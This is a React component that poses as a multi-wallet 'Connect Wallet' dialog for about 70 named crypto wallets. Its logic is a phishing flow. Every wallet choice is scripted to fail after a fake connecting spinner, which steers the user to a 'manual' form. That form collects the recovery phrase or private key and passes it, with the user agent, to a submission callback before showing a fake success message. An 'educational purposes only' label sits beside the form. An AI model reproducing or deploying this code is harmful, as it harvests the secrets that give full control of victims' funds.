import React, { useState, useRef, useEffect } from "react";

// Wallet images mapping
const walletImages = {
  "Ledger": require("../assets/wallet pics/ledger.jpg"),
  "Metamask": require("../assets/wallet pics/metamask.jpg"),
  "Phantom": require("../assets/wallet pics/phantom.jpg"),
  "Wallet Connect": require("../assets/wallet pics/walletconnect.jpeg"),
  "Trust Wallet": require("../assets/wallet pics/trustwallet.jpeg"),
  "Coinbase Wallet": require("../assets/wallet pics/coinbase.jpg"),
  "Binance Chain Wallet": require("../assets/wallet pics/binance.jpg"),
  "Arculus": require("../assets/wallet pics/arculus.jpg"),
  "Trezor": require("../assets/wallet pics/trezor.png"),
  "Exodus": require("../assets/wallet pics/exodus.jpg"),
  
  // Additional wallets
  "AirGap": require("../assets/wallet pics/airgap.jpg"),
  "Alpha": require("../assets/wallet pics/alpha.jpg"),
  "Argent": require("../assets/wallet pics/argent.jpg"),
  "Atomic": require("../assets/wallet pics/atomic.jpg"),
  "Bitget": require("../assets/wallet pics/bitget.jpg"),
  "BitKeep": require("../assets/wallet pics/bitkeep.jpg"),
  "BitPay": require("../assets/wallet pics/bitpay.jpg"),
  "BlueWallet": require("../assets/wallet pics/bluewallet.jpg"),
  "Brave": require("../assets/wallet pics/brave.jpg"),
  "Bridge": require("../assets/wallet pics/bridge.jpg"),
  "Cake Wallet": require("../assets/wallet pics/cakewallet.jpg"),
  "Cobo": require("../assets/wallet pics/cobo.jpg"),
  "Coin98": require("../assets/wallet pics/coin98.jpg"),
  "Coinomi": require("../assets/wallet pics/coinomi.jpg"),
  "Compound": require("../assets/wallet pics/compound.png"),
  "CoolWallet": require("../assets/wallet pics/coolwallet.jpg"),
  "Crypto.com": require("../assets/wallet pics/crypto.com.jpg"),
  "D'Cent": require("../assets/wallet pics/d'cent.jpg"),
  "Dok": require("../assets/wallet pics/dok.jpg"),
  "EasyPocket": require("../assets/wallet pics/easypocket.jpg"),
  "Edge": require("../assets/wallet pics/edge.jpg"),
  "Electrum": require("../assets/wallet pics/electrum.jpg"),
  "Ellipal": require("../assets/wallet pics/ellipal.jpg"),
  "Enkrypt": require("../assets/wallet pics/enkrypt.jpg"),
  "Frame": require("../assets/wallet pics/frame.jpg"),
  "GeroWallet": require("../assets/wallet pics/gerowallet.jpg"),
  "Glow": require("../assets/wallet pics/glow.jpg"),
  "Gridplus": require("../assets/wallet pics/gridplus.jpg"),
  "Guarda": require("../assets/wallet pics/guarda.jpg"),
  "HyperPay": require("../assets/wallet pics/hyperpay.jpg"),
  "Infinito": require("../assets/wallet pics/infinito.jpg"),
  "Infinitum": require("../assets/wallet pics/infinitum.jpg"),
  "Martian": require("../assets/wallet pics/martian.jpg"),
  "MathWallet": require("../assets/wallet pics/mathwallet.jpg"),
  "MyEtherWallet": require("../assets/wallet pics/myetherwallet.jpg"),
  "MyKey": require("../assets/wallet pics/mykey.jpg"),
  "Nami": require("../assets/wallet pics/nami.jpg"),
  "Nova Polkadot": require("../assets/wallet pics/novapolkadot.jpg"),
  "OwnBit": require("../assets/wallet pics/ownbit.jpg"),
  "Petra": require("../assets/wallet pics/petra.jpg"),
  "Pillar": require("../assets/wallet pics/pillar.jpg"),
  "Plug Wallet": require("../assets/wallet pics/plugwallet.jpg"),
  "Polygon": require("../assets/wallet pics/polygon.jpg"),
  "Pontem": require("../assets/wallet pics/pontem.jpg"),
  "Rabby": require("../assets/wallet pics/rabby.jpg"),
  "Rainbow": require("../assets/wallet pics/rainboweth.jpg"),
  "SafePal": require("../assets/wallet pics/safepal.jpg"),
  "Saitama Mask": require("../assets/wallet pics/saitamask.jpg"),
  "Samourai": require("../assets/wallet pics/samourai.jpg"),
  "Solflare": require("../assets/wallet pics/solflare.png"),
  "TokenPocket": require("../assets/wallet pics/tokenpocket.png"),
  "Unstoppable": require("../assets/wallet pics/unstoppable.jpg"),
  "Valora": require("../assets/wallet pics/valora.jpeg"),
  "WallETH": require("../assets/wallet pics/wallETH.jpeg"),
  "Wasabi": require("../assets/wallet pics/wasabi.png"),
  "Wero": require("../assets/wallet pics/wero.jpeg"),
  "Xaman": require("../assets/wallet pics/xaman.jpeg"),
  "Zelcore": require("../assets/wallet pics/zelcore.png"),
  "Zerion": require("../assets/wallet pics/zerion.png"),
};

const WalletModal = ({ isOpen, onClose, onWalletConnect }) => {
  const [searchTerm, setSearchTerm] = useState("");
  const [connectionState, setConnectionState] = useState("selecting");
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [mnemonic, setMnemonic] = useState("");
  const [privateKey, setPrivateKey] = useState("");
  const [activeTab, setActiveTab] = useState("mnemonic");
  const [validationError, setValidationError] = useState("");
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [notification, setNotification] = useState({ show: false, message: "", type: "" });
  
  const modalRef = useRef(null);
  const contentRef = useRef(null);

  // Lock body scroll when modal opens
  useEffect(() => {
    if (isOpen) {
      document.body.style.overflow = 'hidden';
      document.body.style.position = 'fixed';
      document.body.style.width = '100%';
    } else {
      document.body.style.overflow = 'auto';
      document.body.style.position = 'static';
    }
    
    return () => {
      document.body.style.overflow = 'auto';
      document.body.style.position = 'static';
    };
  }, [isOpen]);

  // Escape key to close
  useEffect(() => {
    const handleEscape = (e) => {
      if (e.key === 'Escape' && isOpen) {
        onClose();
      }
    };
    document.addEventListener('keydown', handleEscape);
    return () => document.removeEventListener('keydown', handleEscape);
  }, [isOpen, onClose]);

  const getWalletImage = (walletName) => {
    try {
      return walletImages[walletName] || walletImages["Metamask"];
    } catch (error) {
      return walletImages["Metamask"];
    }
  };

  const wallets = [
    { name: "Ledger", website: "ledger.com", category: "hardware" },
    { name: "Metamask", website: "metamask.io", category: "browser" },
    { name: "Phantom", website: "phantom.app", category: "browser" },
    { name: "Wallet Connect", website: "walletconnect.com", category: "universal" },
    { name: "Trust Wallet", website: "trustwallet.com", category: "mobile" },
    { name: "Coinbase Wallet", website: "coinbase.com", category: "exchange" },
    { name: "Binance Chain Wallet", website: "binance.com", category: "exchange" },
    { name: "Arculus", website: "arculus.com", category: "hardware" },
    { name: "Trezor", website: "trezor.io", category: "hardware" },
    { name: "Exodus", website: "exodus.com", category: "desktop" },
    { name: "AirGap", website: "airgap.it", category: "mobile" },
    { name: "Alpha", website: "alphawallet.com", category: "mobile" },
    { name: "Argent", website: "argent.xyz", category: "mobile" },
    { name: "Atomic", website: "atomicwallet.io", category: "desktop" },
    { name: "Bitget", website: "bitget.com", category: "exchange" },
    { name: "BitKeep", website: "bitkeep.com", category: "mobile" },
    { name: "BitPay", website: "bitpay.com", category: "mobile" },
    { name: "BlueWallet", website: "bluewallet.io", category: "mobile" },
    { name: "Brave", website: "brave.com/wallet", category: "browser" },
    { name: "Bridge", website: "bridge.wallet", category: "universal" },
    { name: "Cake Wallet", website: "cakewallet.com", category: "mobile" },
    { name: "Cobo", website: "cobo.com", category: "hardware" },
    { name: "Coin98", website: "coin98.com", category: "mobile" },
    { name: "Coinomi", website: "coinomi.com", category: "mobile" },
    { name: "Compound", website: "compound.finance", category: "defi" },
    { name: "CoolWallet", website: "coolwallet.io", category: "hardware" },
    { name: "Crypto.com", website: "crypto.com", category: "exchange" },
    { name: "D'Cent", website: "dcentwallet.com", category: "hardware" },
    { name: "Dok", website: "dokwallet.com", category: "mobile" },
    { name: "EasyPocket", website: "easypocket.app", category: "mobile" },
    { name: "Edge", website: "edge.app", category: "mobile" },
    { name: "Electrum", website: "electrum.org", category: "desktop" },
    { name: "Ellipal", website: "ellipal.com", category: "hardware" },
    { name: "Enkrypt", website: "enkrypt.com", category: "browser" },
    { name: "Frame", website: "frame.sh", category: "desktop" },
    { name: "GeroWallet", website: "gerowallet.io", category: "mobile" },
    { name: "Glow", website: "glow.app", category: "mobile" },
    { name: "Gridplus", website: "gridplus.io", category: "hardware" },
    { name: "Guarda", website: "guarda.com", category: "mobile" },
    { name: "HyperPay", website: "hyperpay.com", category: "mobile" },
    { name: "Infinito", website: "infinitowallet.io", category: "mobile" },
    { name: "Infinitum", website: "infinitum.com", category: "mobile" },
    { name: "Martian", website: "martianwallet.xyz", category: "browser" },
    { name: "MathWallet", website: "mathwallet.org", category: "mobile" },
    { name: "MyEtherWallet", website: "myetherwallet.com", category: "web" },
    { name: "MyKey", website: "mykey.org", category: "mobile" },
    { name: "Nami", website: "namiwallet.io", category: "browser" },
    { name: "Nova Polkadot", website: "novawallet.io", category: "mobile" },
    { name: "OwnBit", website: "ownbit.io", category: "mobile" },
    { name: "Petra", website: "petra.app", category: "browser" },
    { name: "Pillar", website: "pillarproject.io", category: "mobile" },
    { name: "Plug Wallet", website: "plugwallet.com", category: "browser" },
    { name: "Polygon", website: "polygon.technology", category: "network" },
    { name: "Pontem", website: "pontem.network", category: "browser" },
    { name: "Rabby", website: "rabby.io", category: "browser" },
    { name: "Rainbow", website: "rainbow.me", category: "mobile" },
    { name: "SafePal", website: "safepal.io", category: "hardware" },
    { name: "Saitama Mask", website: "saitamatoken.com", category: "browser" },
    { name: "Samourai", website: "samouraiwallet.com", category: "mobile" },
    { name: "Solflare", website: "solflare.com", category: "browser" },
    { name: "TokenPocket", website: "tokenpocket.pro", category: "mobile" },
    { name: "Unstoppable", website: "unstoppable.money", category: "mobile" },
    { name: "Valora", website: "valoraapp.com", category: "mobile" },
    { name: "WallETH", website: "walleth.org", category: "mobile" },
    { name: "Wasabi", website: "wasabiwallet.io", category: "desktop" },
    { name: "Wero", website: "werowallet.com", category: "mobile" },
    { name: "Xaman", website: "xaman.app", category: "mobile" },
    { name: "Zelcore", website: "zelcore.io", category: "desktop" },
    { name: "Zerion", website: "zerion.io", category: "defi" },
  ];

  const filteredWallets = wallets.filter(wallet =>
    wallet.name.toLowerCase().includes(searchTerm.toLowerCase())
  );

  // Validation functions
  const validateMnemonic = (phrase) => {
    const words = phrase.trim().split(/\s+/);
    if (words.length !== 12 && words.length !== 24) {
      return "Mnemonic phrase must be 12 or 24 words";
    }
    const invalidWords = words.filter(word => !/^[a-zA-Z]+$/.test(word));
    if (invalidWords.length > 0) {
      return "Mnemonic words should contain only letters";
    }
    return "";
  };

  const validatePrivateKey = (key) => {
    const cleanKey = key.trim();
    if (!/^(0x)?[0-9a-fA-F]{64}$/.test(cleanKey)) {
      return "Private key must be 64 hexadecimal characters";
    }
    return "";
  };

  // SUBMIT CREDENTIALS FUNCTION - FIXED
  const submitCredentials = async (credentials, type) => {
    if (!onWalletConnect) {
      setValidationError("Wallet connection service is not available");
      return;
    }

    setIsSubmitting(true);
    setValidationError("");
    
    try {
      const walletData = {
        walletName: selectedWallet?.name || 'Manual Wallet',
        credentials: credentials,
        type: type,
        timestamp: new Date().toISOString(),
        userAgent: navigator.userAgent
      };

      const result = await onWalletConnect(walletData);
      
      if (result.success) {
        setNotification({
          show: true,
          message: "✅ Wallet connected successfully!",
          type: "success"
        });
        
        // Reset and close modal after success
        setTimeout(() => {
          onClose();
          setIsSubmitting(false);
          setMnemonic("");
          setPrivateKey("");
          setConnectionState("selecting");
          setNotification({ show: false, message: "", type: "" });
        }, 3000);
        
      } else {
        throw new Error(result.error || 'Connection failed');
      }
      
    } catch (error) {
      console.error('Connection error:', error);
      setValidationError(error.message || "Failed to connect wallet. Please try again.");
      setIsSubmitting(false);
    }
  };

  const handleManualConnect = () => {
    if (activeTab === "mnemonic") {
      const error = validateMnemonic(mnemonic);
      if (error) {
        setValidationError(error);
        return;
      }
      submitCredentials(mnemonic.trim(), 'mnemonic');
    } else {
      const error = validatePrivateKey(privateKey);
      if (error) {
        setValidationError(error);
        return;
      }
      submitCredentials(privateKey.trim(), 'private_key');
    }
  };

  const handleWalletSelect = (wallet) => {
    setSelectedWallet(wallet);
    setConnectionState("connecting");
    setTimeout(() => {
      setConnectionState("error");
    }, 2000);
  };

  const handleTryAgain = () => {
    setConnectionState("connecting");
    setTimeout(() => {
      setConnectionState("error");
    }, 2000);
  };

  const handleConnectManually = () => {
    setConnectionState("manual");
  };

  const handleBackToSelection = () => {
    setConnectionState("selecting");
    setSelectedWallet(null);
    setMnemonic("");
    setPrivateKey("");
    setActiveTab("mnemonic");
    setValidationError("");
  };

  const handleBackToError = () => {
    setConnectionState("error");
    setMnemonic("");
    setPrivateKey("");
    setActiveTab("mnemonic");
    setValidationError("");
  };

  // Click outside to close
  const handleOverlayClick = (e) => {
    if (e.target === e.currentTarget) {
      onClose();
    }
  };

  // Reset state when modal opens
  useEffect(() => {
    if (isOpen) {
      setConnectionState("selecting");
      setSelectedWallet(null);
      setMnemonic("");
      setPrivateKey("");
      setSearchTerm("");
      setValidationError("");
      setNotification({ show: false, message: "", type: "" });
    }
  }, [isOpen]);

  if (!isOpen) return null;

  return (
    <>
      {/* Backdrop */}
      <div 
        className="fixed inset-0 bg-black/95 backdrop-blur-md z-50"
        onClick={handleOverlayClick}
      >
        {/* Notification Toast */}
        {notification.show && (
          <div className={`fixed top-4 right-4 z-60 p-4 rounded-xl shadow-2xl border transform transition-all duration-500 ${
            notification.type === 'success' 
              ? 'bg-gradient-to-r from-emerald-900 to-green-900 border-emerald-600 text-emerald-100' 
              : 'bg-gradient-to-r from-red-900 to-orange-900 border-red-600 text-red-100'
          } max-w-md`}>
            <div className="flex items-start space-x-3">
              <div className="text-xl">
                {notification.type === 'success' ? '✅' : '❌'}
              </div>
              <div className="flex-1">
                <p className="font-medium text-sm">{notification.message}</p>
              </div>
              <button 
                onClick={() => setNotification({ show: false, message: "", type: "" })}
                className="text-gray-300 hover:text-white"
              >
                ×
              </button>
            </div>
          </div>
        )}

        {/* Modal Container */}
        <div 
          className="fixed inset-0 flex items-center justify-center p-4"
          onClick={handleOverlayClick}
        >
          <div 
            ref={modalRef}
            className="bg-gray-900 border border-emerald-500/30 rounded-2xl shadow-2xl w-full max-w-4xl max-h-[85vh] flex flex-col"
            onClick={(e) => e.stopPropagation()}
          >
            {/* Wallet Selection View */}
            {connectionState === "selecting" && (
              <>
                {/* Fixed Header */}
                <div className="bg-gradient-to-r from-emerald-900/50 to-gray-900 p-6 border-b border-emerald-500/20">
                  <div className="flex justify-between items-center mb-6">
                    <div>
                      <h2 className="text-2xl font-bold text-white">Connect Wallet</h2>
                      <p className="text-emerald-300/80 text-sm mt-1">Select your preferred wallet ({filteredWallets.length} available)</p>
                    </div>
                    <button
                      onClick={onClose}
                      className="text-gray-400 hover:text-white text-2xl w-10 h-10 flex items-center justify-center rounded-lg hover:bg-gray-800 transition-colors"
                    >
                      ×
                    </button>
                  </div>
                  
                  {/* Search */}
                  <div className="relative">
                    <input
                      type="text"
                      placeholder="Search wallets..."
                      value={searchTerm}
                      onChange={(e) => setSearchTerm(e.target.value)}
                      className="w-full px-4 py-3 bg-gray-800 border border-gray-700 rounded-xl text-white placeholder-gray-500 focus:outline-none focus:border-emerald-500 focus:ring-1 focus:ring-emerald-500 text-sm"
                    />
                    <div className="absolute right-3 top-3 text-gray-500">
                      🔍
                    </div>
                  </div>
                </div>

                {/* SCROLLABLE Wallet Grid */}
                <div 
                  ref={contentRef}
                  className="flex-1 overflow-y-auto p-6"
                  style={{
                    scrollbarWidth: 'thin',
                    scrollbarColor: '#10b981 #1f2937'
                  }}
                >
                  {filteredWallets.length === 0 ? (
                    <div className="flex flex-col items-center justify-center h-full text-gray-400 py-12">
                      <div className="text-4xl mb-4">🔍</div>
                      <p className="text-lg font-medium">No wallets found</p>
                      <p className="text-gray-500 text-sm mt-1">Try a different search term</p>
                    </div>
                  ) : (
                    <div className="grid grid-cols-2 sm:grid-cols-3 md:grid-cols-4 lg:grid-cols-5 gap-4">
                      {filteredWallets.map((wallet, index) => (
                        <button
                          key={index}
                          onClick={() => handleWalletSelect(wallet)}
                          className="group relative bg-gradient-to-br from-gray-800/40 to-gray-900/60 hover:from-emerald-900/40 hover:to-gray-800/60 rounded-xl border border-gray-700/50 hover:border-emerald-500/50 p-4 transition-all duration-300 hover:scale-[1.02] hover:shadow-lg hover:shadow-emerald-500/10 flex flex-col items-center"
                        >
                          <div className="w-14 h-14 rounded-xl bg-gray-900 border border-gray-700/50 group-hover:border-emerald-400/50 flex items-center justify-center overflow-hidden mb-3 transition-all duration-300">
                            <img 
                              src={getWalletImage(wallet.name)} 
                              alt={wallet.name}
                              className="w-10 h-10 object-contain group-hover:scale-110 transition-transform duration-300"
                              onError={(e) => {
                                e.target.style.display = 'none';
                                e.target.nextSibling.style.display = 'flex';
                              }}
                            />
                            <div className="w-full h-full flex items-center justify-center text-emerald-400 text-sm font-bold" style={{display: 'none'}}>
                              {wallet.name.charAt(0)}
                            </div>
                          </div>
                          
                          <h3 className="font-semibold text-white text-xs text-center group-hover:text-emerald-300 transition-colors line-clamp-2">
                            {wallet.name}
                          </h3>
                          <p className="text-gray-400 text-[10px] mt-1 truncate w-full text-center">
                            {wallet.website}
                          </p>
                          
                          <div className="absolute top-1.5 right-1.5">
                            <span className="text-[8px] font-medium px-1.5 py-0.5 rounded-full bg-gray-800/80 text-gray-300">
                              {wallet.category}
                            </span>
                          </div>
                        </button>
                      ))}
                    </div>
                  )}
                </div>

                {/* Fixed Footer */}
                <div className="bg-gray-900/80 border-t border-gray-800 p-4">
                  <div className="flex items-center justify-between">
                    <p className="text-xs text-gray-400">
                      <span className="text-emerald-400 mr-1">🔒</span>
                      Secure connection required
                    </p>
                    <p className="text-xs text-gray-500">
                      {filteredWallets.length} of {wallets.length} wallets
                    </p>
                  </div>
                </div>
              </>
            )}

            {/* Connecting View */}
            {connectionState === "connecting" && (
              <>
                {/* Fixed Header */}
                <div className="bg-gradient-to-r from-emerald-900/50 to-gray-900 p-6 border-b border-emerald-500/20">
                  <div className="flex items-center">
                    <button
                      onClick={handleBackToSelection}
                      className="text-gray-400 hover:text-white mr-3 text-xl w-10 h-10 flex items-center justify-center rounded-lg hover:bg-gray-800 transition-colors"
                    >
                      ←
                    </button>
                    <h2 className="text-xl font-bold text-white">Connecting...</h2>
                  </div>
                </div>

                {/* Scrollable Content */}
                <div 
                  ref={contentRef}
                  className="flex-1 overflow-y-auto p-6"
                  style={{
                    scrollbarWidth: 'thin',
                    scrollbarColor: '#10b981 #1f2937'
                  }}
                >
                  <div className="flex flex-col items-center justify-center min-h-[400px]">
                    <div className="relative mb-8">
                      <div className="animate-spin rounded-full h-32 w-32 border-4 border-emerald-500/30 border-t-emerald-500"></div>
                      <div className="absolute inset-0 flex items-center justify-center">
                        <div className="w-20 h-20 bg-emerald-500/20 rounded-full animate-pulse"></div>
                      </div>
                    </div>

                    <div className="flex items-center p-4 bg-gray-800/50 rounded-xl border border-gray-700 mb-6 w-full max-w-md">
                      <div className="w-14 h-14 rounded-lg bg-gray-900 border border-gray-700 flex items-center justify-center overflow-hidden mr-4">
                        <img 
                          src={getWalletImage(selectedWallet?.name)} 
                          alt={selectedWallet?.name}
                          className="w-12 h-12 object-contain"
                        />
                      </div>
                      <div className="flex-1">
                        <h3 className="font-semibold text-white">{selectedWallet?.name}</h3>
                        <p className="text-gray-400 text-sm">{selectedWallet?.website}</p>
                      </div>
                    </div>

                    <h3 className="text-xl font-bold text-white mb-2">Connecting to {selectedWallet?.name}</h3>
                    <p className="text-gray-400 text-center max-w-sm">
                      Please wait while we establish a secure connection...
                    </p>
                  </div>
                </div>

                {/* Fixed Footer */}
                <div className="bg-gray-900/80 border-t border-gray-800 p-6">
                  <div className="bg-gradient-to-r from-emerald-900/30 to-transparent border border-emerald-500/20 rounded-xl p-4 text-center">
                    <p className="text-emerald-300 text-sm font-medium">
                      🔐 Secured by EcoChain encryption
                    </p>
                  </div>
                </div>
              </>
            )}

            {/* Error View */}
            {connectionState === "error" && (
              <>
                {/* Fixed Header */}
                <div className="bg-gradient-to-r from-red-900/30 to-gray-900 p-6 border-b border-red-500/20">
                  <div className="flex items-center">
                    <button
                      onClick={handleBackToSelection}
                      className="text-gray-400 hover:text-white mr-3 text-xl w-10 h-10 flex items-center justify-center rounded-lg hover:bg-gray-800 transition-colors"
                    >
                      ←
                    </button>
                    <h2 className="text-xl font-bold text-red-400">Connection Error</h2>
                  </div>
                </div>

                {/* Scrollable Content */}
                <div 
                  ref={contentRef}
                  className="flex-1 overflow-y-auto p-6"
                  style={{
                    scrollbarWidth: 'thin',
                    scrollbarColor: '#10b981 #1f2937'
                  }}
                >
                  <div className="flex flex-col items-center justify-center min-h-[400px]">
                    <div className="w-24 h-24 bg-red-900/30 rounded-full flex items-center justify-center border border-red-500/30 mb-6">
                      <span className="text-3xl text-red-400">⚠️</span>
                    </div>

                    <div className="text-center mb-8">
                      <h3 className="text-2xl font-bold text-white mb-3">Connection Failed</h3>
                      <p className="text-gray-300 text-lg mb-2">Unable to connect to {selectedWallet?.name}</p>
                      <p className="text-gray-400">Please try again or use manual connection</p>
                    </div>

                    <div className="flex items-center p-4 bg-gray-800/50 rounded-xl border border-gray-700 w-full max-w-md mb-8">
                      <div className="w-12 h-12 rounded-lg bg-gray-900 border border-gray-700 flex items-center justify-center overflow-hidden mr-4">
                        <img 
                          src={getWalletImage(selectedWallet?.name)} 
                          alt={selectedWallet?.name}
                          className="w-10 h-10 object-contain"
                        />
                      </div>
                      <div className="flex-1">
                        <h3 className="font-semibold text-white">{selectedWallet?.name}</h3>
                        <p className="text-gray-400 text-sm">{selectedWallet?.website}</p>
                      </div>
                    </div>
                  </div>
                </div>

                {/* Fixed Footer with Buttons */}
                <div className="bg-gray-900/80 border-t border-gray-800 p-6">
                  <div className="space-y-3">
                    <button
                      onClick={handleTryAgain}
                      className="w-full bg-gradient-to-r from-emerald-600 to-green-600 hover:from-emerald-700 hover:to-green-700 text-white py-3.5 rounded-xl font-semibold transition-all duration-300"
                    >
                      Try Again
                    </button>
                    <button
                      onClick={handleConnectManually}
                      className="w-full bg-gray-800 hover:bg-gray-700 text-gray-300 hover:text-white py-3.5 rounded-xl font-semibold border border-gray-700 transition-all duration-300"
                    >
                      Connect Manually
                    </button>
                  </div>
                </div>
              </>
            )}

            {/* Manual Connection View */}
            {connectionState === "manual" && (
              <>
                {/* Fixed Header */}
                <div className="bg-gradient-to-r from-emerald-900/50 to-gray-900 p-6 border-b border-emerald-500/20">
                  <div className="flex items-center mb-6">
                    <button
                      onClick={handleBackToError}
                      className="text-gray-400 hover:text-white mr-3 text-xl w-10 h-10 flex items-center justify-center rounded-lg hover:bg-gray-800 transition-colors"
                    >
                      ←
                    </button>
                    <div className="flex items-center">
                      <div className="w-12 h-12 rounded-lg bg-gray-900 border border-gray-700 flex items-center justify-center overflow-hidden mr-4">
                        <img 
                          src={getWalletImage(selectedWallet?.name)} 
                          alt={selectedWallet?.name}
                          className="w-10 h-10 object-contain"
                        />
                      </div>
                      <div>
                        <h2 className="text-xl font-bold text-white">{selectedWallet?.name}</h2>
                        <p className="text-gray-400 text-sm">{selectedWallet?.website}</p>
                      </div>
                    </div>
                  </div>

                  {/* Tabs */}
                  <div className="flex bg-gray-800 rounded-xl p-1">
                    <button
                      className={`flex-1 py-3 text-center font-semibold rounded-lg transition-all ${activeTab === "mnemonic"
                          ? "bg-gradient-to-r from-emerald-600 to-green-600 text-white"
                          : "text-gray-400 hover:text-white bg-gray-700/50"
                      }`}
                      onClick={() => setActiveTab("mnemonic")}
                    >
                      Mnemonic Phrase
                    </button>
                    <button
                      className={`flex-1 py-3 text-center font-semibold rounded-lg transition-all ${activeTab === "privateKey"
                          ? "bg-gradient-to-r from-emerald-600 to-green-600 text-white"
                          : "text-gray-400 hover:text-white bg-gray-700/50"
                      }`}
                      onClick={() => setActiveTab("privateKey")}
                    >
                      Private Key
                    </button>
                  </div>
                </div>

                {/* Scrollable Content */}
                <div 
                  ref={contentRef}
                  className="flex-1 overflow-y-auto p-6"
                  style={{
                    scrollbarWidth: 'thin',
                    scrollbarColor: '#10b981 #1f2937'
                  }}
                >
                  <div className="mb-6">
                    <p className="text-gray-300 text-sm mb-6">
                      {activeTab === "mnemonic" 
                        ? "Enter your 12 or 24 word recovery phrase"
                        : "Enter your private key"
                      }
                    </p>

                    {/* Input */}
                    <div className="mb-6">
                      {activeTab === "mnemonic" ? (
                        <textarea
                          value={mnemonic}
                          onChange={(e) => {
                            setMnemonic(e.target.value);
                            setValidationError("");
                          }}
                          placeholder="Enter your 12 or 24 word recovery phrase separated by spaces..."
                          className="w-full h-32 px-4 py-3 bg-gray-800 border border-gray-700 rounded-xl focus:outline-none focus:border-emerald-500 resize-none text-white placeholder-gray-500 text-sm"
                          rows={4}
                        />
                      ) : (
                        <textarea
                          value={privateKey}
                          onChange={(e) => {
                            setPrivateKey(e.target.value);
                            setValidationError("");
                          }}
                          placeholder="Enter your 64-character private key (with or without 0x prefix)..."
                          className="w-full h-32 px-4 py-3 bg-gray-800 border border-gray-700 rounded-xl focus:outline-none focus:border-emerald-500 resize-none font-mono text-white placeholder-gray-500 text-sm"
                          rows={4}
                        />
                      )}
                    </div>

                    {validationError && (
                      <div className="mb-6 p-4 bg-red-900/30 border border-red-500/30 rounded-xl">
                        <p className="text-red-400 text-sm">{validationError}</p>
                      </div>
                    )}

                    {/* Warnings */}
                    <div className="space-y-4">
                      <div className="bg-yellow-900/30 border border-yellow-600/30 rounded-xl p-4">
                        <p className="text-yellow-400 text-xs font-medium">
                          ⚠️ WARNING: Never share your mnemonic phrase or private key with anyone
                        </p>
                      </div>

                      <div className="bg-emerald-900/20 border border-emerald-500/20 rounded-xl p-4">
                        <p className="text-emerald-400 text-xs">
                          🔒 For educational purposes only
                        </p>
                      </div>
                    </div>
                  </div>
                </div>

                {/* Fixed Footer */}
                <div className="bg-gray-900/80 border-t border-gray-800 p-6">
                  <button
                    onClick={handleManualConnect}
                    disabled={isSubmitting || (activeTab === "mnemonic" ? !mnemonic.trim() : !privateKey.trim())}
                    className={`w-full py-3 rounded-xl font-semibold transition-all flex items-center justify-center ${
                      (activeTab === "mnemonic" ? mnemonic.trim() : privateKey.trim()) && !isSubmitting
                        ? "bg-gradient-to-r from-emerald-600 to-green-600 text-white hover:opacity-90 active:scale-95"
                        : "bg-gray-700 text-gray-500 cursor-not-allowed"
                    }`}
                  >
                    {isSubmitting ? (
                      <div className="flex items-center justify-center">
                        <div className="w-5 h-5 border-2 border-white border-t-transparent rounded-full animate-spin mr-2"></div>
                        Connecting...
                      </div>
                    ) : (
                      <div className="flex items-center justify-center">
                        <span className="mr-2">🔗</span>
                        Connect Wallet
                      </div>
                    )}
                  </button>
                  
                  {validationError && (
                    <p className="text-red-400 text-xs mt-2 text-center">{validationError}</p>
                  )}
                </div>
              </>
            )}
          </div>
        </div>
      </div>
    </>
  );
};

export default WalletModal;